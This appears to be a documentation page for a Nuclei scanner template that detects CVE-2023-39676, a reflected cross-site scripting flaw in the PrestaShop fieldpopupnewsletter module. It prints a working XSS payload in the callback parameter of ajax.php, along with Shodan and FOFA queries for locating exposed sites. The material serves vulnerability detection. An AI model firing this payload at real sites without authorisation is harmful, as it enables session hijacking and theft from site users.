PrestaShop fieldpopupnewsletter Module - Cross Site Scripting
ID: CVE-2023-39676
Severity: medium
Author: meme-lord
Tags: cve2023,cve,prestashop,xss,fieldthemes
Description
Section titled “Description”Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
YAML Source
Section titled “YAML Source”id: CVE-2023-39676
info: name: PrestaShop fieldpopupnewsletter Module - Cross Site Scripting author: meme-lord severity: medium description: | Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential theft of sensitive information, session hijacking, or defacement. reference: - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ - https://sorcery.ie - https://themeforest.net/user/fieldthemes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.00167 epss-percentile: 0.53401 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" max-request: 1 vendor: fieldthemes product: fieldpopupnewsletter framework: prestashop shodan-query: - html:"fieldpopupnewsletter" - http.html:"fieldpopupnewsletter" fofa-query: body="fieldpopupnewsletter" tags: cve2023,cve,prestashop,xss,fieldthemes
http: - method: GET path: - "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and matchers: - type: word part: body words: - "<script>alert(document.domain)</script>" - "Invalid email" condition: and
- type: status status: - 200# digest: 490a0046304402204f0cf0bda6285a9437e51ee96a5824cca33e1ca1dbc17c78ee9ef72f4c3c33bf02202fc51ad97e1c5d3f41f25fee38983c78b8d034f1a3a80882686c8463697ada9d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39676.yaml"